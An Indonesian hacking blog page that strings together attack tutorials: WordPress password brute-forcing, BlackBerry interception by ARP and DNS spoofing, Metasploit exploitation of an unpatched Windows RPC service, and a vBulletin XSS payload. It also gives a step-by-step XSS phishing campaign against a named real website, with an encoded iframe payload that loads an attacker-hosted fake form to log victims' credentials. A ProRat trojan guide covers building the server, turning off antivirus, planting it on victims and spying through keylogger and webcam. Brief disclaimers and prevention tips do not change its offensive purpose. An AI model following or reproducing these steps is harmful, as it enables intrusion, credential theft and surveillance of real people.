Selasa, 14 Januari 2014

Wordpress Bruteforce Perl script



 http://img32.imageshack.us/img32/8658/hqe9.png


Bahan – Bahan :

-         Perl (Bisa Memakai Strawberry Perl )
-         Script Wordpress Brute ( http://pastebin.com/WVF4SxTE )


Langkah - Langkah :

1).Install Perl Dulu Kalo Sudah Download Script Tadi Dan Simpan Dengan Format .pl contoh brute.pl
2).Buka CMD Ketikan Sesuai Letak Directory Untuk Lebih Mudahnya Letakan di C:/perl/brute.pl
 

http://i.imgur.com/eUyp2mC.png

3).Ketik perl namafile.pl site userwordpress wordlistkamu Contoh : perl brute.pl site root pass.txt Teken Enter

 http://img35.imageshack.us/img35/725/zz5k.png

4).Tunggu Hingga Succes Jika Anda Memakai Metode Ini Harus Bersabar  

 http://img12.imageshack.us/img12/9942/m74h.png

5).Jika Succes Akan Terlihat Seperti Ini Dehh :v
http://img32.imageshack.us/img32/8658/hqe9.png

BlackBerry Hacking – Email & Facebook


Tahukan BlackBerry, tak lain adalah sebuah Handphone atau telepon Genggam yang kadang kala dapat membuat tangan kita menjadi “AUTIS” hehehe, ternyata dibalik kemewahannya perangkat yang satu ini bisa juga diserang (attack) dengan menggunakan jaringan wireless yang sudah disematkan pada generasi terbaru Blackberry. Dan serangan yang secara umun serangan dilakukan adalah via TCP/IP dengan menggunakan metode “arpspoof dab dnsspoof”.
Karena menurut beberapa ahli bahwa salah satu kelemahan sekaligus kekuatan Blackberry adalah adanya feature “proxying” yang hampir ada pada setiap device dari RIM ini, yang mana hampir secara keseluruhan layananan Blackberry baik itu e-mail (pushmail), browsing baik dari dan menuju perangkat Blackberry kita melalui server Blackberry (untuk kawasan ASIA PASIFIK) server berada ap.blackberry.com
6134_1129559517483_1182078273_30396283_6759743_nAda beberapa metode yang bisa mengakibatkan perangkat Blackberry di “Attack”.
1. ARP Spoofing :Untuk dapat melakukan capture data melalui switches network, salah satu cara yang bisa dilakukan adalah dengan “meracuni/meng-inject” tabel ARP pada perangkat Blackberry yang dikenal sebagai ARP Spoofing yang bisa juga kita sebut sebagai metode ARP poisoning atau ARP poison routing. Tabel ARP inilah yang digunakan perangkat Blackberry untuk berkomunikasi dengan netwok device yang lain.
sebagai contoh, ketika seseorang mencoba untuk mengkoneksikan Blackberrynya ke salah satu wireless access point (WAP) hingga terhubung ke dalam jaringan, dan selanjutnya dengan menggunakan teknik serangn ARP spoofing guna meracuni tabel dalam ARP (internal) yang dimiliki oleh Blackberry, sehingga Blackberry yang telah diracuni berikut dengan server akan mengirim seluruh data dari dan menuju Blackberry yang diracuni melewati Blackberry “attacker” terlebih dulu.
Jika diilustrasikan kira sebagai berikut :
6134_1129563157574_1182078273_30396295_7612835_ndengan metode ini ternyata bahwa seluruh aliran data bisa diterima oleh “attacker” terlebih dulu melewati komputer yang telah diatur sebelumnya, dengan menggunakan tool’s Cain Abel yang mana applikasi ini juga secara otomatis menciptakan sertifikat palsu (fake) yang nantinya akan memalsukan sertifikat asli yang digunakan oleh ap.blackberry.com akan tetapi juga harus dingat bahwa seluruh koneksi akan di=”proxy” oleh rcp.ap.blackberry.com dan komunikasi akan menggunakan SSL :
6134_1129559677487_1182078273_30396287_5563037_nKemudian attacker dapat meng-capture traffic jaringan untuk dianalisa lebih lanjut, disamping itu biasanya attacker juga menggunakan program “Wireshark” untuk menampung data yang akan di decrypt menggunakan aplikasi lain yang disebut juga SSL**** , metode ini digunakan untuk mengubah data tersebut menjadi “cleartext” dengan menggunakan sertifikat palsu tentunya.
2. DNS Spoofing :
Metode kedua ini dilakukan dengan memanfaatkan topologi (peta/mapping) network model “proxying” yang digunakan Blackberry terhadap rcp.ap.blackberry.com. Dengan cara maka seluruh perangkat Blackberry yang mengunakan jaringan server regional (Asia Pasific) akan mengira bahwa server (WAP=wireless access point) yang telah diset oleh attacker sebagai server regional BIS “DNS Spoofing is the art of making a DNS to point to an another IP that it would be supposed to point to”
Ada beberapa langkah yang harus dilakukan oleh attacker pertama-tama dengan melakukan spoofing DNS entri dari server DNS (dengan menggunakan WAP, maka attacker akan masuk ke server dan menambahkan entri sebagai berikut rcp.ap.blackberry.com yang kemudian akan dikonfigurasi oleh komputer yang telah diset sebelumnya untuk melakukan “capture data, edit, serta manipulasi data”
Setelah berhasil menambahkan rcp.ap.blackberry.com maka dengan kata lain seluruh blackberry yang terkoneksi ke access point dan DNS tersebut akan dengan sukarela masuk ke dalam komputer attacker dan attacker akan mengkonfigurasi antara blackbery dengan server menggunakan SSL. Akan tetapi jika jeli maka saat melakukan browsing sementara blackberry sudah di “HacK” sebenarnya blackberry kita akan memberikan peringatan seperti ini :
6134_1129559797490_1182078273_30396290_8067343_nDisini attacker juga harus menggunakan “Stunnel” untuk menghubungkan komputer attacker dengan pengguna blackberry serta server rcp.ap.blackberry.com ini dimaksudkan agar aktifitas blackberry yang di “hack” tetap berlangsung dengan menggunakan SSL tentunya dengan menggunakan sertifikat palsu yang sudah dibuat sebelumnya.
Biasanya Attacker juga menggunakan Blackbag untuk menghubungkan pengguna blackberry ke server sesungguhnya yang telah diubah kedalam “plaintext” kira-kira seperti ini :
Dan pada akhirnya PIN pengirim sekaligus penerima terkirim plaintext dan memungkinkan attacker untuk mendapatkan informasi baik itu berupa e-mail, browsing, chat dan juga waktu aktifikas pengguna blackberrypun bisa diketahui oleh attacker. PIN yang “tidak dapat diubah” mengakibatkan pemilik PIN asli dapat dengan mudah diserang seperti halnya “denial of service serta abuse” dari attacker atau kira-kira seperti ini
“Blackberry PIN is an eight character hexadecimal identification number assigned to each Blackberry device. PINS cannot be changed and are locked to each handset. Blackberrys can message each other using the PIN directly or by using the Blackberry Messenger application”.
Source: http://asrul[dot]blogdetik[dot]com

Tutorial Hacking Dengan Metasploit


Selamat Pagi all, kali ini saya akan share sedikit tentang aplikasi hacker favorit saya. Yaitu adalah METAPLOIT Framework ver. 2.6. Aplikasi ini berfungsi untuk mengexploitasi kelemahan suatu system ataupun aplikasi. Aplikasi ini bisa untuk penetration testing ke System Windows, Unix/Linux, dan MacOs, tapi yang lebih cenderung Exploitable adalah Windows SP1. Untuk lebih lengkapnya dapat di baca di website resminya www.metasploit.com.
Ketika saya menulis artikel ini, metasploit sudah merilis yang versi 3.5, tapi saya menggunakan versi 2.6, karna pada dasarnya sama saja, hanya saja versi 3.5 lebih banyak exploitnya :D . Oh iya, dalam Metasploit Framework, kita sudah disediakan banyak exploit, sehingga tidak perlu mendownload lagi. Fungsi exploit yaitu mengirim bufferOverflow pada system korban, sehingga kita dapat menTakeOver shellnya.
Langsung saja, berikut installasinya di Windows.
1. Download dulu di webiste resminya www.metasploit.com, jika tak ada ver. 2.6, coba cari aja di Google, :Dusaha sedikit gan.
2.  Kemudian install, dan jalankan msfweb.
Maka akan muncul window shell seperti berikut.
3. Buka Web Browser bisa Internet Explorer, Mozilla, OperaMini, dll. Dan pergi ke http://127.0.0.1:55555, maka tampilannya seperti berikut.
Mungkin tampilan web gui anda akan sedikit berbeda, karena templatenya disini telah saya ganti. :D
4. Kemudian cari corban yang akan kita exploitasi. Bisa menggunakan NMAP, terus kita lakukan port scanning. Disini kita akan mencoba pada system OS Windows Server 2003 yg masih fresh install (belum di Patch). Pada port scanning, pastikan port untuk MSRPC tebuka (default = open). Download NMAP diwww.nmap.org
5.Memilih Exploit.
Pada Metasploit Web Interface, di bagian FILTER MODULES pilih “app :: dcom”, setelah itu pilih exploitMicrosoft RPC DCOM MSO3-026.
Pilih target pada pilihan Select Target
6. Memilih Payload
Pilih salah satu payload diatas, jika masih bingung, pilih saja win32_bind, yang akan mengexploitasi dan langsung masuk ke command shell target. Berikut beberapa fungsi2 payload :
win32_adduser : menambah user pada system korban
win32_bind : masuk ke shell korban
win32_bind_dllinject : untuk upload / inject dll files
win32_bind_meterpreter : exploitasi dengan menjalankan meterpreter (i like it :) ).
win32_bind_vncinject : inject vncserver pada system korba (untuk kita remote melalui vncviewer).
win32_downloadexec : mendownload dan mengeksekusi aplikasi pada pc korban
win32_exec : mengeksekusi command di system korban.
Sedangkan BIND, PASSIVE, REVERSE, pada dasarnya sama saja.
RHOST ==>> Ip Address Korban (Remote).
LHOST ==>> Ip Address Kita (Local)
RPORT ==>> Port Korban
LPORT ==>> Local Open Port
Setelah diisi semua, kemudian klik exploit untuk mengHack. Hahaha :D , selamat mencoba.
Source: http://lebaksono<dotz>wordpress<dotz>com/2010/11/16/hacking-dengan-metasploit-exploit/

XSS: Internet Explorer & Mozilla Firefox


Kali ini saya ingin berbagi pengalaman, bagaimana melakukan XSS di Internet Explorer 9 & Mozilla Firefox 4.01
Internet Explorer 9 Mozilla Firefox 4.0.1
Apa sih perbedaanya antara keduanya:
Oke yuk mari kita analisa bagaimana XSS ini dapat dilakukan,
Pertama: Internet Explorer 9
  1. Secara default, internet explorer 9 akan melakukan proteksi terhadap segala sesuatu yang berbau script, biasanya dalam code “<script></script>
  2. IE Memproteksi XSS
    Default setting XSS Filter
  3. Agar supaya kita dapat melakukan XSS, maka kita harus menon-aktifkan Anti-XSS Library, dengan melakukan “Disable” XSS Filter
  4. Disable XSS Filter
  5. Setelah di “Disable“, maka XSS Attack bisa dilakukan di Internet Explorer.
  6. XSS Bisa dilakukan di IE9
Kedua: Mozilla Firefox 4.0.1
  1. Mozilla Firefox tidak memiliki Anti-XSS Library, sehingga secara Default kita bisa langsung melakukan XSS.
  2. XSS on Mozilla
  3. Namun disediakan XSS Filter dari beberapa plug-in (Silakan dicari sendiri)
Oke, yuk mari kita coba seberapa powerfullnya XSS: Cross Site Scripting
Saya mau make Mozilla Firefox 4.0.1 aja deh.
Banyak yang bertanya, apa hebat & bahayanya sih XSS?
Yang tidak mengetahui & belum ber-eksperimen pasti bilang:
  • Apa hebatnya sih, cuman nulis di URL doank
  • Begituan mah gak ada gunanya
  • XSS mah gak bisa dideface halamannya
  • Itu kan cuman perubahan address doank
Saya hanya tersenyum ketika mendengar diskusi mengenai hal ini :)
Nah, dari sekian banyak bahayanya XSS, mari kita ambil salah satunya “STEALING ACCOUNT IN VULNERABLE WEBSITE“. (Harap Dijadikan Bahan Pembelajaran & Proteksi Diri Saja Ya, Artikel Ini Hanya Untuk Menambah Wawasan)
Dalam hal ini saya memanfaatkan XSS dikombinasikan dengan Human Vulnerability, karena semua pasti sudah mengetahui, bahwa Manusia Adalah Unpatched Vulnerability :)
Skenarionya adalah:
  1. Kita mendapatkan vulnerable website yang bisa dilakukan XSS
  2. Kita membuat sebuah script yang bisa digunakan untuk register / login & membuat sebuah file script (php) yang bisa digunakan untuk mengambil informasi account & menyimpannya di logs.
  3. Kita sebarkan linknya ke beberapa email / messenger / chatbox / irc, dsb.
  4. Tunggu & kita mendapatkannya deh :D
Langkah-langkahnya adalah:
Pertama
  • Saya menggunakan vulnerable XSS dari website www.eset.com.mx, ESET merupakan salah satu perusahaan AntiVirus yang juga sangat terkenal di Dunia, namun memiliki kelemahan juga di websitenya.
  • Test XSS apakah bisa berjalan di website, berikut contohnya:http://www.eset.com.mx/xtrasappz/evalform/index.php?t=emav&promocode=%22%3E%3Ccenter%3E%3Cfont%20size=%22300%22%3EBinus%20Hacker%20Ada%20Disini%3Cbr%3Ehttp://www.binushacker.net%3C/font%3E%3C/center%3E%3C/
  • Test XSS For Binus Hacker
  • Test cookies (ternyata ada), berhubung artikelnya bukan stealing cookies, kita lewatin aja :)
  • Oke, sudah ketahuan websitenya vulnerable
Kedua
  • Dalam benak, banyak ide, antara login & register pages.
  • Akhirnya kembali coding, membuat  page halaman register di ESET
  • Fake Register Pages - Binus Hacker
  • Kemudian membuat php untuk menerima hasil & menyimpannya di log, berikut:
  • Script Log Untuk Menyimpan Hasil XSS
  • Fake register tadi yang saya buat saya simpan di: http://restinpeace.biz/eset/, permission filenya sudah disetting supaya tidak bisa dibaca filenya, hanya bisa melihat directorynya. Hhehe.. :D
Ketiga
  • Disini kita akan menggunakan html code <iframe>
  • Sebelum kita melakukan aksi, maka code XSS: “<iframe src=http://restinpeace.biz/eset/register.php width=1500>” di encode dulu menjadi:%3Ciframe%20src%3Dhttp%3A%2F%2Frestinpeace.biz%2Feset%2Fregister.php%20width%3D1500%3E
  • Copy code tersebut ke URL sehingga menjadi:http://www.eset.com.mx/xtrasappz/evalform/index.php?t=emav&promocode=%22%3E%3Ciframe%20src%3Dhttp%3A%2F%2Frestinpeace.biz%2Feset%2Fregister.php%20width%3D1500%3E
  • Eset Node Iframe
  • Karena masih kelihatan di URL, maka kita tambahin menggunakan spasi (” “), sehingga URL iframe tidak tampak di address  karena kepanjangan:http://www.eset.com.mx/xtrasappz/evalform/index.php?t=emav&promocode=%22%3E%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Ciframe%20src%3Dhttp%3A%2F%2Frestinpeace.biz%2Feset%2Fregister.php%20width%3D1500%3E, sekarang tidak adak kelihatan lagi di URL Address script XSSnya.
  • Menghide URL Address
  • Sudah selesai page untuk fake register, lanjut ke step selanjutnya
Keempat
  • Sebarkan melalui email, chat, messenger dan sebagainya, silakan gunakan cara masing-masing. Anda disini belajar menjadi spammer & phiser (Ingat! Artikel ini hanya untuk pembelajaran, kita tidak akan lebih baik jika melakukan kejahatan, namun akan lebih berguna jika kita memiliki ilmu agar tidak terjebak & tertipu oleh penjahat!)
Kelima
  • Kita tunggu hasilnya & kita cek log yang masuk
  • Taaaadddddaaaaaa, ada beberapa yang masuk :D
  • Hasilnya & Jangan Lupa Follow Twitter
Download Source Code:
Download Source Code Xss Article BinusHacker
Kita tidak akan menjadi hebat dengan melakukan kejahatan, namun kita akan jauh lebih baik jika mengetahui ilmu pengetahuan, membagi dengan yang lain, memproteksi diri sendiri. Tuhan Akan Melihat Apa Yang Ada Pada Niat Yang Kita Lakukan Bukan Dari Pendapat Orang.
Jadi untuk semua selamat belajar & semoga bermanfaat.

vBulletin XSS Exploitation


Latar Belakang Kita semua pasti mengetahui mengenai aplikasi vBulletin.

Ya vBulletin merupakan aplikasi forum dimana ketika kita mendengar mengenai aplikasi tersebut, terlintas di pikiran kita adalah suatu aplikasi yang “cukup aman”.Tetapi seiring dengan perkembangannya, ada beberapa fitur yang ditambahkan semisal “profile customization”, sehingga tidak menutup kemungkinan akan munculnya vulnerability/kelemahan baru dalam aplikasi tersebut.
Pada area kustomisasi, pengguna sangat mungkin untuk menambahkan atau merubah kode warna seperti : #00112233, kode RGB seperti rgb(255, 255, 255) dan bahkan gambar!. Ini sangat dimungkinkan dengan menambahkan url(‘path/ke/gambar.jpg’). Bahkan bisa lebih dari itu…
vBulletin Dengan fitur baru dari vBulletin cms ini dimana sistem dapat menerima input dari user, sangat dimungkinkan untuk disisipi kode-kode tertentu untuk kepentingan tertentu. Misalnya memasukkan string tertentu ?’ABCD”/\>< .

vBulletin Seperti yang terlihat pada gambar diatas, kustomisasi profil pada vBulletin mengijinkan karakter untuk dimasukkan(bahkan meskipun inputan tersebut invalid).
Pada contoh diatas, setiap aphostrope(kutip satu ‘) dirubah menjadi : \’ dimana langkah ini adalah baik karena jika hal tersebut diijinkan hacker dapat sangat mungkin untuk menambahkan javascript ke dalamnya. Tetapi ada 1 hal lainnya yaitu quotes(kutip dua) dan tag HTML tidak di-encode/di-escape. Ini sangat memungkinkan hacker untuk melakukan injeksi tag HTML. Namun script javascript disini tidak dapat di-inject kedalamnya, karena penggunaan dari preg_match() nya PHP.
Bukan berarti tag <script> tidak dapat digunakan dikarenakan di-encode oleh sistem lalu itu berarti hacker tidak dapat mengeksekusi javascript. Lihat contoh script dibawah ini :

Ternyata kita dapat menambahkan suatu gambar secara penuh ke dalam profile page yang kita miliki.
Lalu Bagaimana Dengan Javascript?
Misalkan kita mencoba memasukkan suatu string seperti format berikut di bawah ini :
url(<script>img src=”x:x” onerror=”alert(String.fromCharCode(72,101,108,108,79,32,118,52,76))” />)
Akan keluar tampilan seperti di bawah ini :
Ternyata Javascript pun dapat dieksekusi pada vBulletin software. Sebetulnya serangan XSS berbahaya jika serangan tersebut berhasil melakukan redirect dari server asal ke server milik hacker yang memungkinkan serangan browser exploit seperti Exploit pada IE6,7,8 atau serangan IE_Aurora. Suatu string yang disisipkan untuk melakukan redirecting halaman dapat digambarkan seperti pada kode dibawah ini : (untuk melihat kode dibawah, klik pada kotak “my affiliations” ) Kode diatas hanyalah contoh saja…saya tidak menyimpan exploit di web server yang saya miliki :P
Dari contoh kode diatas sangat memungkinkan untuk dilakukan remote exploit melalui vBulletin. Mudah2an informasinya bermanfaat.
Pencegahan :
1. Pastikan anda menggunakan browser terbaru(paling up-to-date) ketika akan melihat user profile pada forum vBulletin, setidaknya langkah tersebut dapat meminimalisir serangan browser exploit.
Seluruh data diatas hanyalah untuk tujuan informasi saja. Untuk setiap penyalahgunaan penulis tidak bertanggung jawab.
Source: http://vishnuvalentino.com/computer/vbulletin-xss-exploitation/

Hacking Dengan PRORAT


Kali ini mari kita bermain dengan salah satu tools hacking,yaitu prorat.
Tools buatan orang Turkey ini sangat luar biasa, tools ini berfungsi untuk menyusup ke komputer orang lain. Caranya sangat gampang dan mudah sekali, tinggal kita mengetahui IP dan Port komputer korban, maka kita dapat langsung menginfeksinya.
A. Cara penggunaan ProRat
1. Pertama kali kita harus mengetahui terlebih dahulu IP dan Port korban yang terbuka. Kita dapat melakukannya dengan cara manual atau juga dengan bantuan Ports Scanner.
Dari gambar diatas kita mengetahui semua IP komputer yang aktif dan Port mana saja yang terbuka. Yang akan dijadikan korban pada percobaan kita kali ini adalah komputer dengan IP 192.162.10.233.
2. Langkah selanjutnya yaitu kita jalankan ProRat, tools ini dapat di download di http://www.prorat.net . Sebelumnya matiin dulu Anti Virus kamu (disable), karena ProRat akan terdeteksi sebagai virus. Padahal dia tidak berbahaya bagi komputer kita. Setelah itu isikan IP korban pada form IP dan Portnya (default 5110).
Apabila kita klik tombol Connect maka koneksi ke komputer korban belum bisa, karena komputer korban belum kita infeksi. Untuk menginfeksi komputer korban kita terlebih dahulu membuat server yang akan dijalankan pada komputer korban. Caranya klik tombol Create – Create Prorat Server. Lalu muncul tampilan Notifications :
Centang pilihan Use Proconnective Notifications dan isi IP(DNS)Address dengan IP kita. Pada tab General Setting kita isikan Server Port (default 5110), Server Password dan Victim Name.
Pada tab Bind with File kita dapat menyusupkan file yang akan dijalankan bersama Server. Extensi file bebas.
Selanjutnya adalah tab Server Extension, ada beberapa pilihan extensi server. Kita pilih yang berekstensi .Exe.
Untuk membuat icon server kita klik tab Server Icon, pilih icon apa saja yang kamu inginkan.
Langkah terakhir dari pembuatan server ini adalah klik Create Server.
Setelah berhasil, akan tampil :
3. Kita tinggal menjalankan Server tersebut dikomputer korban. Caranya terserah kamu… mau disusupkan diam-diam atau memakai teknik Social Engineering dan juga dapat kamu infeksikan langsung pada komputer tersebut (kalo bias sihh).
4. Setelah Server tersebut berhasil berjalan pada komputer korban, maka kita langsung mencoba mengkoneksikannya dengan komputer kita.
5. Untuk koneksi kita dapat menggunakan ProConnective atau langsung mengetikkan IP address dan Port komputer korban. ProConnective adalah tools bawaan dari ProRat yang berfungsi sebagai Bridge (jembatan koneksi) antara komputer server dan komputer client (korban). Akan nampak IP korban apabila dia sedang on.
6. Setelah berhasil melakukan koneksi ke komputer korban maka status dari ProRat akan berubah dari Disconnected ke Connected
7. Nah…saatnya kita bermain. Ada banyak hal yang dapat kita lakukan pada komputer korban seperti mengetahui informasi dari PC, mengirimkan pesan error, mematikan komputer, mengunci mouse, membuka CD-ROM atau bahkan memotret wajah korban .
8. Sekarang kita akan melihat PC info korban :
Dari gambar diatas kita dapat melihat informasi yang dimiliki dari komputer korban.
9. Kita juga dapat mengirimkan pesan error palsu ke komputer korban :
10. Memasang Keylogger.
11. Dan yang paling seru adalah melihat wajah dari korban yang kita hack.
Bagaimana seru kan? Itu masih sebagian kecil dari kegunaan ProRat masih banyak lagi fungsi lainnya, seperti memformat hardisk milik korban, mengacaukan registry, mencuri data-data penting dan lain sebagainya. Akan tetapi, dalam pembahasan kita kali ini kita cukupkan sekian saja ya. Ok !
Gunakan dengan baik ya…
B. Cara Pencegahan
1. Update selalu Anti Virus anda agar mampu mendeteksi adanya infeksi dari ProRat. Biasanya server ProRat terdeteksi sebagai
Trojan.Dropper.Prorat.DZ.29, Dropped:Backdoor.Prorat.DZ.
2. Pasanglah Anti Prorat, anda bisa mendownloadnya di www.softpedia.com/get/Antivirus/Anti-prorat.shtml.
Selamat mencoba…

Postingan Lebih Baru Postingan Lama Beranda